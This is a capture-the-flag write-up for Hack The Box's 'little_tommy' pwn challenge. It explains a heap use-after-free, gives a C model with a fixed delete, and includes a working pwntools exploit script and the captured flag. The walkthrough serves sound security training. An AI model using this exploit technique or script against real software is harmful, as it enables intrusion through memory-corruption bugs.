Categories: pwn, reverse engineering
Detailed walkthrough and exploit
1. Basic checks:
```
┌──(root💀kali)-[~/hackthebox/challenge/pwn/little_tommy]
└─# file little_tommy
little_tommy: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=861838865726f48aa954b8df920d1be3ae683b40, not stripped
┌──(root💀kali)-[~/hackthebox/challenge/pwn/little_tommy]
└─# checksec little_tommy
[*] '/root/hackthebox/challenge/pwn/little_tommy/little_tommy'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
```
2. General overview:
There are 5 options to choose from.
The first function, “Create account” (1), allocates 72B of space on the heap with malloc().
The maximum length of the “First name” field (2) is 32B, and the same limit applies to the “Last name” field (3).
The second option, “Display account”, prints bytes 0–31 of the heap chunk as “First name”, bytes 32–64 as “Last name” and bytes 65–72 as “Account balance”.
The third function deletes the account by calling free() on the space pointed to by *main_account.
The fourth option, “Add memo”, copies user input to the heap.
The last option prints the flag if an account has been created and bytes 64–72 of the account variable's space (which lives on the heap) are set to 0x6b637566, which is “fuck” in ASCII.
3. Spot the vulnerability:
There is a Use-After-Free, a vulnerability class caused by incorrect handling of dynamic memory while the program runs.
If you first create an account, the pointer used for the dynamic allocation will point at the end of the chunk (1).
If you then delete it, the pointer, instead of being set to NULL, continues to refer to the now-freed memory; the result is a dangling pointer (2).
If the program then allocates this same chunk of memory to *memo (3), the dangling pointer will now reference this new data.
So in the end, *main_account + 0x40 is overwritten by bytes 64–72 of the data supplied through the “Add memo” functionality (4).
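To make the mechanism above concrete, here is an added C model of the account/memo layout (not the challenge's source; the struct fields, function names and the memo payload are assumptions taken from this write-up) contrasting a delete that leaves the pointer dangling with one that clears it:

```c
/* Added example, not the challenge's own source: a model of little_tommy's heap
 * layout showing why "Delete account" must also NULL the pointer. Struct and memo
 * sizes follow the write-up; field names and function names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct account {            /* 72 bytes, like the chunk malloc()ed by "Create account" */
    char first_name[32];
    char last_name[32];
    char balance[8];        /* bytes 64..71; "Print flag" looks at the first four */
};

static struct account *main_account;
static char *memo;

/* Constructed memo from the write-up: 64 filler bytes, then "fuck" at offset 0x40. */
static const char MEMO_PAYLOAD[] =
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "fuck";

/* "Print flag" condition: 0x6b637566 stored little-endian on i386 reads "fuck". */
static int flag_check_bytes(const char *buf, size_t len) {
    return len >= 68 && memcmp(buf + 64, "fuck", 4) == 0;
}

static void delete_vulnerable(void) { free(main_account); }      /* pointer left dangling */
static void delete_fixed(void) { free(main_account); main_account = NULL; }

/* Create -> delete -> add memo of the same size -> "Print flag". With the vulnerable
 * delete, glibc hands the freed 72-byte chunk straight back for the memo, so the memo
 * bytes are visible through main_account (undefined behaviour, shown on purpose). */
static int run_sequence(void (*delete_fn)(void)) {
    main_account = calloc(1, sizeof *main_account);
    if (main_account == NULL) return 0;
    strcpy(main_account->first_name, "aaaa");
    strcpy(main_account->last_name, "aaaa");
    delete_fn();
    memo = malloc(sizeof(struct account));
    memcpy(memo, MEMO_PAYLOAD, sizeof MEMO_PAYLOAD - 1);
    int got_flag = main_account != NULL &&
                   flag_check_bytes((const char *)main_account, sizeof *main_account);
    free(memo);
    main_account = NULL;    /* avoid a double free on the next run */
    return got_flag;
}

int main(void) {
    printf("vulnerable delete: %s\n", run_sequence(delete_vulnerable) ? "flag check passed" : "refused");
    printf("fixed delete:      %s\n", run_sequence(delete_fixed) ? "flag check passed" : "refused");
    return 0;
}
```

With glibc the first line reports that the check passed through the dangling pointer; the fixed delete makes "Print flag" refuse regardless of what the memo contains.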
4. Exploit the Use-After-Free vulnerability locally:
First, create an account with arbitrary data (it can be blank).
```
Please enter an operation number: 1
First name: aaaa
Last name: aaaa
Thank you, your account number 155584960.
```
Then delete this account, so that *main_account is left dangling.
```
Please enter an operation number: 3
Account deleted successfully
```
Add a memo to overwrite the freed memory referenced by *main_account with custom bytes, so that the bytes at offset 0x40 become “fuck”.
```
Please enter an operation number: 4
Please enter memo: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaafuck
Thank you, please keep this reference number number safe: 155584960.
```
Use the 5th option to read the flag, since both conditions are now true. Locally there is no flag file next to the binary, so /bin/cat reports an error; against the remote instance the same sequence prints the flag.
```
Please enter an operation number: 5
/bin/cat: flag: 没有那个文件或目录
```
```python
from pwn import *
from time import sleep

# Local process; for the HTB instance use remote("<host>", <port>) instead (placeholder values).
p = process("./little_tommy")

# 1. Create an account (the contents do not matter)
p.recvuntil("Please enter an operation number:")
sleep(1)
p.sendline("1")
sleep(1)
p.recvuntil("First name:")
p.sendline("luci")
sleep(1)
p.recvuntil("Last name:")
p.sendline("luci")
sleep(1)

# 2. Delete it: main_account keeps pointing at the freed chunk
p.recvuntil("Please enter an operation number:")
p.sendline("3")
p.recvuntil("Account deleted successfully")
sleep(1)

# 3. Add a memo of the same size: the freed chunk is reused, and bytes 64..67 become "fuck"
p.recvuntil("Please enter an operation number:")
p.sendline("4")
sleep(1)
p.recvuntil("Please enter memo:")
p.sendline("A" * 64 + "fuck")
p.recvuntil("Thank you, please keep this reference number number safe:")
sleep(1)

# 4. Print the flag: the account pointer is non-NULL and *(main_account + 0x40) == 0x6b637566
p.recvuntil("Please enter an operation number:")
p.sendline("5")
p.interactive()
```
```
Please enter an operation number: [DEBUG] Received 0x3 bytes:
    '5\r\n'
[DEBUG] Received 0x9e bytes:
    'HTB{I_am_so_heaped_up_right_now}\r\n'
    '\r\n'
    '1. Create account\r\n'
    '2. Display account\r\n'
    '3. Delete account\r\n'
    '4. Add memo\r\n'
    '5. Print flag\r\n'
    '\r\n'
    'Please enter an operation number: '
```